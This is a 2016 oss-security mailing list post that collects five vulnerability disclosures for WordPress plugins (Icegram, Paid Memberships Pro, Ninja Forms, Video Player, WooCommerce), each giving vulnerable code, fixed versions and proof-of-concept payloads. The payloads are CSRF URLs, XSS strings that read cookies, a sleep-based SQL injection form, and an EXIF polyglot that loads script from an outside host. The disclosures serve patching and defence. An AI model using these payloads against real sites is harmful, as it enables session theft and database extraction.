Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 20 Jul 2016 18:26:24 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities affecting five WordPress Plugins (XSS, CSRF
 & SQLi)

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.



------------------------------------------------------------------------
Cross-Site Request Forgery in Icegram WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Request Forgery vulnerability was found in the Icegram
WordPress Plugin. This issue allows an attacker to overwrite any
WordPress option with the value true. An attacker may use this issue to
enable (vulnerable) WordPress features that are disabled in the target
site.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0032

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the Icegram - Popups, Optins, CTAs
& lot more... [2] WordPress Plugin version 1.9.18.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Icegram 1.9.19 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Icegram  [2] WordPress Plugin allows creating beautiful popups,
hellobars, slide-ins & notifications. Capture leads, Instant results and
awesome support. A Cross-Site Reqeust Forgery vulnerability exists in
Icegram that allows an attacker to overwrite any WordPress option with
the value true. An attacker may use this issue to enable (vulnerable)
WordPress features that are disabled in the target site.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerability exists in the file icegram.php. As can be seen in the
code fragment below, the plugin reads the value of the option_name URL
parameter and uses this value as a key to update_option(). This allows
an attacker to create an link that will overwrite an arbitrary WordPress
option. The value of target option will be set to true.

update_option($_GET['option_name'], true);

In order to exploit this issue, the attacker has to lure/force a logged
on WordPress Administrator into opening a malicious link. If a logged in
Administrator opens the following URL, the ability for users to register
will be enabled:

http://<target>/wp-admin/edit.php?dismiss_admin_notice=1&option_name=users_can_register
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_icegram_wordpress_plugin.html
[2] https://wordpress.org/plugins/icegram/
[3] https://downloads.wordpress.org/plugin/icegram.1.9.19.zip
------------------------------------------------------------------------
Cross-Site Scripting vulnerability in Paid Memberships Pro WordPress
Plugin
------------------------------------------------------------------------
Burak Kelebek, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Paid Memberships
Pro WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0015

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Paid Memberships Pro [2] WordPress
Plugin version 1.8.9.3.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in commit d39a18b [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
Cross-Site Scripting (XSS) attacks are a type of injection, in which
malicious scripts are injected into otherwise benign and trusted web
sites. XSS attacks occur when an attacker uses a web application to send
malicious code, generally in the form of a browser side script, to a
different end user. Flaws that allow these attacks to succeed are quite
widespread and occur anywhere a web application uses input from a user
within the output it generates without validating or encoding it.
Reflected XSS occurs when user input is immediately returned by a web
application in an error message, search result, or any other response
that includes some or all of the input provided by the user as part of
the request

"plugin_status" field does not validate <script> tags and does not
perform output encoding.

paid-memberships-pro/adminpages/addons.php
72: echo echo
admin_url("admin.php?page=pmpro-addons&force-check=1&plugin_status=" .
$status); 
33: $status = $_REQUEST['plugin_status']; 

An attacker needs to lure a logged-in admin to follow the link in the
proof of concept below. 

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
http://<targetsite>/wp-admin/admin.php?page=pmpro-addons&plugin_status=foofoo%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3Ca
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_paid_memberships_pro_wordpress_plugin.html
[2] https://wordpress.org/plugins/paid-memberships-pro/
[3]
https://github.com/strangerstudios/paid-memberships-pro/commit/d39a18b3e9fd373665a23e5e79e8caff77a3e7f4
------------------------------------------------------------------------
Multiple Cross-Site Scripting vulnerabilities in Ninja Forms WordPress
Plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
Multiple reflected Cross-Site Scripting (XSS) vulnerabilities have been
found in the Ninja Forms WordPress Plugin. By using this issue an
attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the relevant
application content. 

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160714-0017

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Ninja Forms WordPress Plugin [2]
version 2.9.51.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in Ninja Forms v2.9.52 (18 July 2016) [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Ninja Forms plugin [2] is a plugin that simplifies
creating forms and managing submissions. Multiple reflected Cross-Site
Scripting vulnerabilities have been discovered in the WordPress Ninja
Forms plugin that allow an unauthenticated attacker to inject malicious
JavaScript code into the application, which will execute within the
browser of any user who views the relevant application content. The
attacker-supplied code can perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, performing
arbitrary actions on their behalf, and logging their keystrokes or
deliver malware.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress Ninja Forms plugin insufficiently performs CSRF validation
(ajaxreferer and nonce) and fails to perform output encoding according
to context at any point where user-supplied input is copied into
application responses. The vulnerability at least resides in the
admin-ajax.php and edit.php page actions of the Ninja Forms plugin. As a
result this malicious code will be executed. 

Authenticated WP-Admins can be induced to issue the attacker's crafted
request in various ways. For example, the attacker can send a victim a
link containing a malicious URL or they can create an innocuous looking
web site that causes anyone viewing it to make arbitrary cross-domain
requests to the vulnerable application (using GET).

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
These vulnerabilities can be demonstrated by submitting the following
requests to the form_id parameter of the admin-ajax.php and edit.php
pages respectively:
/wp-admin/admin-ajax.php?step=4&total_steps=6&args[form_id]=1lxmjg<img
src%3daonerror%3dalert(document.cookie)>meiij&args[filename]=kllk'<&action=nf_download_all_subs

/wp-admin/edit.php?post_status=all&post_type=nf_sub&action=-1&m=0&form_id=1'><script>alert(`SumOfPwn.nl`)<%2Fscript>&paged=1&mode=list&action2=-1

Please note that the other parameter in this request are also
vulnerable.
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_cross_site_scripting_vulnerabilities_in_ninja_forms_wordpress_plugin.html
[2] https://wordpress.org/plugins/ninja-forms/
[3] https://wordpress.org/plugins/ninja-forms/changelog/
------------------------------------------------------------------------
Multiple SQL injection vulnerabilities in WordPress Video Player
------------------------------------------------------------------------
David Vaartjes & Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that WordPress Video Player is affected by multiple
blind SQL injection vulnerabilities. Using these issues it is possible
for a logged on Contributor (or higher) to extract arbitrary data (eg,
the Administrator's password hash) from the WordPress database.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0004

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Video Player [2]
WordPress plugin version 1.5.16.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WordPress Video Player 1.5.18 [3].

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WordPress Video Player is a WordPress video plugin that allows you to
easily add videos to your website. WordPress Video Player is affected by
multiple blind SQL injection vulnerabilities. Using these issues it is
possible for a logged on Contributor (or higher) to extract arbitrary
data (eg, the Administrator's password hash) from the WordPress
database.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The vulnerabilities exist in the functions show_tag(),
spider_video_select_playlist(), and spider_video_select_video(). The
author tried to prevent SQL injection by calling the esc_sql() [4]
WordPress function. However, the user input is used in the ORDER BY
clause and is consequently not quoted. Due to this it is possible to
inject arbitrary SQL statements despite the use of esc_sql()

show_tag():

[...]
	
if (isset($_POST['page_number'])) {
	if ($_POST['asc_or_desc']) {
		$sort["sortid_by"] =
esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if ($_POST['asc_or_desc'] == 1) {
			$sort["custom_style"] = "manage-column column-title sorted asc";
			$sort["1_or_2"] = "2";
			$order = "ORDER BY " . $sort["sortid_by"] . " ASC";
		} else {
			$sort["custom_style"] = "manage-column column-title sorted desc";
			$sort["1_or_2"] = "1";
			$order = "ORDER BY " . $sort["sortid_by"] . " DESC";
		}
	}
 
spider_video_select_playlist():

[...]
if(isset($_POST['page_number']))
{
	if($_POST['asc_or_desc'])
	{
		$sort["sortid_by"]=esc_sql(esc_html(stripslashes($_POST['order_by'])));
		if($_POST['asc_or_desc']==1)
		{
			$sort["custom_style"]="manage-column column-title sorted asc";
			$sort["1_or_2"]="2";
			$order="ORDER BY ".$sort["sortid_by"]." ASC";
		}
		else
		{
			$sort["custom_style"]="manage-column column-title sorted desc";
			$sort["1_or_2"]="1";
			$order="ORDER BY ".$sort["sortid_by"]." DESC";
		}
	}

function spider_video_select_video():

[...]
	
if(isset($_POST['page_number']))
{
		if($_POST['asc_or_desc'])
		{
			$sort["sortid_by"]=esc_html(stripslashes($_POST['order_by']));
			if($_POST['asc_or_desc']==1)
			{
				$sort["custom_style"]="manage-column column-title sorted asc";
				$sort["1_or_2"]="2";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." ASC";
			}
			else
			{
				$sort["custom_style"]="manage-column column-title sorted desc";
				$sort["1_or_2"]="1";
				$order="ORDER BY ".esc_sql($sort["sortid_by"])." DESC";
			}
		}

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin-ajax.php?action=spiderVeideoPlayerselectplaylist"
method="POST">
			<input type="hidden" name="search_events_by_title" value="" />
			<input type="hidden" name="page_number" value="0" />
			<input type="hidden" name="serch_or_not" value="" />
			<input type="hidden" name="asc_or_desc" value="1" />
			<input type="hidden" name="order_by" value="(CASE WHEN (SELECT
sleep(10)) = 1 THEN id ELSE title END) ASC #" />
			<input type="hidden" name="option" value="com_Spider_Video_Player" />
			<input type="hidden" name="task" value="select_playlist" />
			<input type="hidden" name="boxchecked" value="0" />
			<input type="hidden" name="filter_order_playlist" value="" />
			<input type="hidden" name="filter_order_Dir_playlist" value="" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/multiple_sql_injection_vulnerabilities_in_wordpress_video_player.html
[2] https://wordpress.org/plugins/player/
[3] https://downloads.wordpress.org/plugin/player.1.5.18.zip
[4] https://codex.wordpress.org/Function_Reference/esc_sql
------------------------------------------------------------------------
Persistent Cross-Site Scripting in WooCommerce using image metadata
(EXIF)
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WooCommerce WordPress Plugin (millions of active installations). An
attacker can create a specially crafted image file which, when uploaded
as a product image in WordPress, injects malicious JavaScript code into
the application. An attacker can use this vulnerability to perform a
wide variety of actions, such as stealing victims' session tokens or
login credentials, and performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160720-0006

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WooCommerce [2] version 2.6.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in WooCommerce 2.6.3 [3] (Release Notes [4]).

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WooCommerce [5] is a free eCommerce plugin for WordPress. It is the
world's favorite eCommerce solution that gives both store owners and
developers complete control. A persistent Cross-Site Scripting (XSS)
vulnerability has been found in the WooCommerce WordPress Plugin
(millions of active installations). An attacker can create a specially
crafted image file which, when uploaded as a product image in WordPress,
injects malicious JavaScript code into the application. An attacker can
use this vulnerability to perform a wide variety of actions, such as
stealing victims' session tokens or login credentials, and performing
arbitrary actions on their behalf.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
WooCommerce uses meta data from an image file to fill in the 'Caption'
section of an uploaded image in WordPress. Meta data of an image must be
treated as untrusted user input and can be manipulated using an
Exchangeable Image File Format (EXIF) editor. A vulnerability was found
in the way WooCommerce processes meta data (Caption). Using a specially
crafted image it is possible to trigger a Cross-Site Scripting condition
in WooCommerce.

It is difficult for a WP admin to determine if an image contains a
malicious meta data. An attacker can craft and spread a popular image
via social media with malicious Cross-Site Scripting payload that will
be used as Caption by WooCommerce. When an admin upload this image as
product image and gallery item without properly checking meta data it is
possible to malicious scripting code is injected in the WooCommerce
site. An attacker can use this vulnerability to perform a wide variety
of actions, such as stealing victims' session tokens or login
credentials, and performing arbitrary actions on their behalf.

The code fragment below shows that meta data is used for the caption and
title of an image.

function wc_rest_set_uploaded_image_as_attachment( $upload, $id = 0 ) {
	$info    = wp_check_filetype( $upload['file'] );
	$title   = '';
	$content = '';
	
	if ( ! function_exists( 'wp_generate_attachment_metadata' ) ) {
		include_once( ABSPATH . 'wp-admin/includes/image.php' );
	}
	
	if ( $image_meta = wp_read_image_metadata( $upload['file'] ) ) {
		if ( trim( $image_meta['title'] ) && ! is_numeric( sanitize_title(
$image_meta['title'] ) ) ) {
			$title = $image_meta['title'];
		}
		if ( trim( $image_meta['caption'] ) ) {
			$content = $image_meta['caption'];
		}
	}
	
	$attachment = array(
		'post_mime_type' => $info['type'],
		'guid'           => $upload['url'],
		'post_parent'    => $id,
		'post_title'     => $title,
		'post_content'   => $content,
	);
	
	$attachment_id = wp_insert_attachment( $attachment, $upload['file'],
$id );
	if ( ! is_wp_error( $attachment_id ) ) {
		wp_update_attachment_metadata( $attachment_id,
wp_generate_attachment_metadata( $attachment_id, $upload['file'] ) );
	}
	return $attachment_id;
}

As seen in the code listing below the output of the meta data is not
properly encoded, resulting in persistent Cross-Site Scripting.

<div class="images">
	<?php
		if ( has_post_thumbnail() ) {
			$attachment_count = count( $product->get_gallery_attachment_ids() );
			$gallery          = $attachment_count > 0 ? '[product-gallery]' : '';
			$props            = wc_get_product_attachment_props(
get_post_thumbnail_id(), $post );
			$image            = get_the_post_thumbnail( $post->ID, apply_filters(
'single_product_large_thumbnail_size', 'shop_single' ), array(
			'title'     => $props['title'],
			'alt'    => $props['alt'],
		) );
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf(
'<a href="%s" itemprop="image" class="woocommerce-main-image zoom"
title="%s" data-rel="prettyPhoto' . $gallery . '">%s</a>',
$props['url'], $props['caption'], $image ), $post->ID );
		} else {
			echo apply_filters( 'woocommerce_single_product_image_html', sprintf(
'<img src="%s" alt="%s" />', wc_placeholder_img_src(), __(
'Placeholder', 'woocommerce' ) ), $post->ID );
		}
		do_action( 'woocommerce_product_thumbnails' );
	?>
</div>

------------------------------------------------------------------------
Reproduction
------------------------------------------------------------------------
The following two images can be user to reproduce this issue:

- Product image [6]
- Gallery image [7]

It is also possible to craft your own malicious image using an EXIF
editor, the following payloads can be used:

Product image:

jaVasCript:/*-/*`/*\`/*'/*"/**/(/*
*/oNcliCk='s=document.createElement(`script`);s.src=`https://sumofpwn.nl/js/jquery.js`;document.body.appendChild(s)
'//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

Gallery image:

<a href="javascript&#58alert(document.cookie);">Click for new Pokemon
game</a>

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_woocommerce_using_image_metadata__exif_.html
[2] https://wordpress.org/plugins/woocommerce/developers/
[3] https://downloads.wordpress.org/plugin/woocommerce.2.6.3.zip
[4]
https://woocommerce.wordpress.com/2016/07/19/woocommerce-2-6-3-fixsecurity-release-notes/
[5] https://wordpress.org/plugins/woocommerce/
[6] https://sumofpwn.nl/advisory/2016/SumOfPwn_productimage.jpg
[7] https://sumofpwn.nl/advisory/2016/WinPokemonGO_gallery_item.jpg

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ